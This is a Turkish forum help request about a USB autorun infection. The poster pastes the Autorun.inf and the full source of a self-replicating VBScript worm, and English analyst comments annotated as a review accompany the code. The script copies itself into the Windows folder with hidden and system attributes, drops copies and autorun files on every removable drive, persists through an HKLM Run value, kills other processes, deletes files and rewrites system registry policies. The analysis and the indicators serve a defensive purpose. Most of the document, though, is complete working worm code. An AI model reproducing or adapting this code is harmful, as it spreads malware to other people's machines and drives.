Arkadaşlar, iş yerinde kullandığım (çok kullanıcılı) bilgisayara flash bellek taktığımda bellek içerisine direkt Autorun.inf ve M1K9H3A6.vbs isimli dosyaları atıyor; psikolojim bozuldu. kill_amvo_virus_usb_en.vbs'yi falan denedim, düzelmiyor; virüs taraması yaptım, bir şey değişmedi. Ne yapabilirim? Yardımlarınızı rica ediyorum.
Autorun.inf dosyasını Not Defteri ile açtığımda aşağıdakiler çıkıyor:
; NOTE(review): when AutoPlay/AutoRun is enabled for the drive, Windows processes
; this file on insertion; the ShellExecute entry hands the dropped script to
; WScript.exe, which is how the worm below gets started from the flash drive.
[autorun]
ShellExecute = WScript.exe M1K9H3A6.vbs
M1K9H3A6.vbs dosyasını Not Defteri ile açtığımda aşağıdakiler çıkıyor:
'NOTE(review): analyst annotation of a self-replicating VBScript (autorun worm).
'The original header claimed "This program is an Anti worm and will not get
'dammege to the computer". It does carry a clean-up routine that removes
'files of OTHER autorun worms (see InfectedFiles), but it also copies itself
'into the Windows folder, drops a copy plus Autorun.inf on every removable
'drive, and persists through a Run value named "MKH".
'Indicators derived from the code below: the Run value "MKH" under HKLM
'(...\CurrentVersion\Run), a copy of this script in the Windows folder with
'the same file name as the original drop, and a file named M#K#H#A#.vbs
'(digits 1-9) next to Autorun.inf at the root of each removable drive.
'----------------------------------------------------------------------
'NOTE(review): the spaces inside long registry paths and numbers further
'down (e.g. "Servi ces", "Cur rentVersion", "6710 8863") look like forum
'line-wrap artifacts; this pasted listing is probably not byte-faithful to
'the file on disk.
Dim InfectedFiles, InfectedDir
Dim FSO, Shell, To_File, Disk_Drive, Autorun, MF, MKH_RunDir, WinDir, in_WinDir, Text, MKHSource, Temp
Dim InF, RegPath, RndName, FilNam
'Directories indexed by the second field of each InfectedFiles record.
'Index 3 ("All Drivers") means "check the root of every drive" in the
'clean-up loop near the end; that loop treats ANY index >= 3 the same way,
'so indices 4 and 5 are never used as directory paths.
InfectedDir = Array ("C:\" _
,"C:\Windows\" _
,"C:\Windows\System32\" _
,"All Drivers" _
,"C:\Windows\System32\Drivers\" _
,"C:\Windows\System32\DLLCache\")
'Flat array of 5-field records (stride 5, see the "Step 5" loop below)
'describing files of other malware that this script removes:
' InfectedFile, InfectedDirID, InfectedRegKey, Infectedram, "Family"
' field 0: file name
' field 1: index into InfectedDir (>= 3 means root of every drive)
' field 2: Run-value name that gets blanked out ("0" = skip)
' field 3: process image name passed to TaskKill /IM
' field 4: vendor-style detection label; informational only, never read by the code
InfectedFiles = Array ("1THES92P.EXE" , 3, "0" , "0" , "0" _
,"2IFETRI.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"3WCXX91.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"4SV.EXE" , 3, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"4SV.EXE" , 2, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"AMVO.EXE" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"AMVO0.DLL" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"ASC3360PR.SCR", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.PIF", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.EXE", 3, "0" , "0" , "W32-Sality.gen" _
,"AVP.EXE" , 3, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO.EXE" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO0.DLL" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AWDA2.EXE" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"BGOTRTU0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"CAPP.PIF" , 3, "0" , "0" , "0" _
,"CDROM.SYS" , 4, "0" , "0" , "Win32/Protector.H" _
,"CDROM.SYS" , 5, "0" , "0" , "Win32/Protector.H" _
,"CKTTQN.PIF" , 3, "0" , "0" , "0" _
,"CKVO.EXE" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"CKVO0.DLL" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"COPY.EXE" , 3, "sqlserv" , "0" , "W32/SqlCop.worm" _
,"CTFM0N.EXE" , 2, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"DSETWEM0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"EJ10FKDO.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"GODERT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"GSIT.PIF" , 3, "0" , "0" , "0" _
,"HELP.EXE.TMP" , 2, "avpa" , "HELP.EXE.TMP", "W32/Sality.*" _
,"HNDCBM.PIF" , 3, "0" , "0" , "0" _
,"HOST.EXE" , 3, "0" , "0" , "0" _
,"HVLWLV.EXE" , 3, "0" , "0" , "0" _
,"IMAGE.EXE" , 2, "My App" , "IMAGE.EXE" , "0" _
,"IMAGE.EXE" , 3, "My App" , "IMAGE.EXE" , "0" _
,"KAMSOFT.EXE" , 2, "kamsoft" , "0" , "0" _
,"KAV.EXE" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO.EXE" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO0.DLL" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"L1.COM" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"LHGJYIT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"MINE.EXE" , 2, "0" , "0" , "W32/Injector.BDW" _
,"MMVO.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"MMVO0.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"N1DE2ECT.COM" , 0, "0" , "0" , "0" _
,"N68MQCRA.EXE" , 3, "0" , "0" , "0" _
,"NAR.VBS" , 3, "nar" , "0" , "VBS/Autorun.worm.k" _
,"NASY.EXE" , 3, "0" , "0" , "0" _
,"NIDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NLDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NMDFGDS0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "Generic PWS.ak" _
,"NTDEIECT.COM" , 0, "0" , "0" , "0" _
,"NTDELECT.COM" , 0, "0" , "0" , "0" _
,"O1.COM" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"OLHRWEF.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"OPTYHWW0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"PYTDFSE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"QALA.EXE" , 3, "0" , "0" , "0" _
,"QPHDIN.COM" , 3, "cdoosoft" , "CCSVCHST.EXE", "0" _
,"QXZV5.EXE" , 2, "0" , "0" , "Win32/Peerfrag.DR" _
,"QYQPLS.PIF" , 3, "0" , "0" , "0" _
,"RAV.EXE" , 3, "rava" , "0" , "PWS-Gamania.gen.a" _
,"RB.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"SCVVHSOT.EXE" , 2, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SCVVHSOT.EXE" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SYNCMAN.EXE" , 2, "syncman" , "SYNCMAN.EXE" , "0" _
,"TAVO.EXE" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TAVO1.DLL" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TJJQTEJQ.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"TT.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"UPDATD7.EXE" , 1, "0" , "0" , "W32/Kryptik.BQR" _
,"URET463.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"URRETND.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"USERINIT.EXE" , 3, "0" , "0" , "W32/Virut.n.gen" _
,"USB_RUN.EXE" , 3, "syncman" , "SYNCMAN.EXE" , "0" _
,"UWEYIWE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"WINDOWSAV.EXE", 3, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"WMSRVC.EXE" , 2, "0" , "0" , "W32/Injector.AZZ" _
,"X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XMG.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"XN1I9X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XYJOWL.PIF" , 3, "0" , "0" , "0" _
)
'Every runtime error is swallowed from here on: missing files, failed
'registry writes and the property typo further down all fail silently.
On Error Resume Next
'Run key path used for persistence and for blanking other worms' Run values
'(the space before the trailing backslash is kept as pasted; see note above).
RegPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.shell")
'--- Locate own file, own name, parent folder and the Windows folder ---
'in_WinDir: 0 = running from elsewhere (e.g. a drive root), 1 = running
'from the Windows folder; 2 is only a placeholder before the check below.
in_WinDir = 2
Set MF = FSO.GetFile(Wscript.ScriptFullName)
FilNam = WScript.ScriptName
MKH_RunDir = FSO.GetParentFolderName(MF)
'GetSpecialFolder(0) is the Windows folder.
Set WinDir = FSO.GetSpecialFolder(0)
'---If not running from the Windows folder, open an Explorer window at the
'folder the script was launched from (presumably to mimic what AutoPlay's
'"open folder" action would show the user)--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Shell.Run(WinDir & "\Explorer.exe /root," & MKH_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If
'---Enter when no copy exists in the Windows folder yet (FileExists compared
'with 0, i.e. False), or when this instance IS the Windows-folder copy--->
If (FSO.FileExists(WinDir & "\" & FilNam) = 0 Or in_WinDir = 1) Then
'Dead assignment: lacks the space before the file name and is overwritten
'unconditionally a few lines further down.
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe" & FilNam
'Read own source text (1 = ForReading, -2 = TristateUseDefault) so it can
'be written out again verbatim as the dropped copies.
Set Text = MF.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
MKHSource = MKHSource & Text.ReadLine
MKHSource = MKHSource & VBCrLf
Loop
'Install: when launched from outside the Windows folder, write a copy of
'self into it under the same file name. Attributes = 32 (archive only) is
'set first so an existing hidden/system/read-only copy can be overwritten;
'39 = archive + system + hidden + read-only is applied afterwards.
If (in_WinDir = 0) Then
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(WinDir & "\" & FilNam, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 39
End If
'Random drop name of the form M#K#H#A#.vbs, each # a digit 1-9
'(Int((9 * Rnd) + 1)); the poster's M1K9H3A6.vbs is one such instance.
Randomize
RndName = "M" & Int((9 * Rnd) + 1) _
& "K" & Int((9 * Rnd) + 1) _
& "H" & Int((9 * Rnd) + 1) _
& "A" & Int((9 * Rnd) + 1) _
& ".vbs"
'Content of the Autorun.inf dropped next to the random-named copy.
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe " & RndName
'Only the Windows-folder copy (in_WinDir = 1) runs this loop, and nothing
'inside it changes in_WinDir, so it never terminates; one pass every
'60 seconds (Sleep at the bottom).
Do While (in_WinDir = 1)
'---Drop a copy of self plus Autorun.inf at the root of every removable
'drive (DriveType = 1), skipping drive A:--->
For Each Disk_Drive in FSO.Drives
'Typo: the property is DriveLetter, not DriverLetter; the error is
'swallowed by On Error Resume Next, so this message box presumably
'never appears.
msgbox(Disk_Drive.DriverLetter)
If (Disk_Drive.DriveType = 1 And Disk_Drive.DriveLetter <> "A") Then
'Same attribute dance as the install step: clear to 32, overwrite, then 39.
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\" & RndName, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 39
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\Autorun.inf", 2, True)
To_File.Write Autorun
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 39
End If
Next
'---Persistence: Run value "MKH" under HKLM points at the Windows-folder
'copy (written again unconditionally at the very end of the script)--->
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"
'---Turn AutoRun off for all drive types (NoDriveTypeAutoRun = 255) and
'all drive letters (NoDriveAutoRun) for the machine, the current user and
'the default profile -- presumably to keep competing autorun worms from
'launching; the installed copy itself no longer depends on AutoRun--->
Shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun",0,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\policies\Explorer\NoDriveTypeAutoRun", 255,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\policies\Explorer\NoDriveAutoRun",6710 8863,"REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveAutoRun",67108 863,"REG_DWORD"
Shell.RegWrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cu rrentVersion\Policies\Explorer\NoDriveAutoRun",671 08863,"REG_DWORD"
'---Reset Explorer's hidden-file view settings (Hidden = 1, ShowSuperHidden
'= 1 and the Folder\Hidden / Folder\SuperHidden option defaults)
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\NOHIDD EN\CheckedValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\NOHIDD EN\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL L\CheckedValue", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL L\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\SuperHidden\C heckedValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\SuperHidden\D efaultValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\Type", "Group", "REG_SZ"
'---Re-enable Folder Options, the Registry Editor and Task Manager by
'setting the corresponding policy values to 0
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
'Clean-up of other malware: walk InfectedFiles one 5-field record at a time.
For InF = 0 To UBound(InfectedFiles) Step 5
'Field 1 < 3: look in the fixed InfectedDir path; otherwise check the root
'of every removable (1) or fixed (2) drive except A:.
If (InfectedFiles(InF + 1) < 3) Then
If (FSO.FileExists(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF)) = True) Then
'Kill the process named in field 3, blank the Run value named in field 2
'in both HKLM and HKCU, strip the file's attributes, then delete it via
'cmd /C DEL.
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF))
To_File.Attributes = 32
'A File object has no Close method; this raises and is swallowed.
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF), 0, True)
End If
Else
For Each Disk_Drive In FSO.Drives
If ((Disk_Drive.DriveType = 1 Or Disk_Drive.DriveType = 2) And Disk_Drive.DriveLetter <> "A") Then
If (FSO.FileExists(Disk_Drive.Path & "\" & InfectedFiles(InF)) = True) Then
'Same kill / blank Run value / strip attributes / delete sequence as above,
'applied at the drive root.
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & InfectedFiles(InF))
To_File.Attributes = 32
'A File object has no Close method; this raises and is swallowed.
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & Disk_Drive.Path & "\" & InfectedFiles(InF), 0, True)
End If
End If
Next
End If
Next
'Wait 60 seconds, then repeat the drop / registry / clean-up pass.
WScript.Sleep(60000)
Loop
'---Launched from a drive rather than the Windows folder: start the
'installed copy (Shell.Run ..., 1, 0 = normal window, do not wait) so this
'instance can exit and the removable drive is not held in use--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Temp = WinDir & "\" & FilNam
Shell.Run Temp, 1, 0
End If
End If
'Persistence written again on every run, from either location.
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"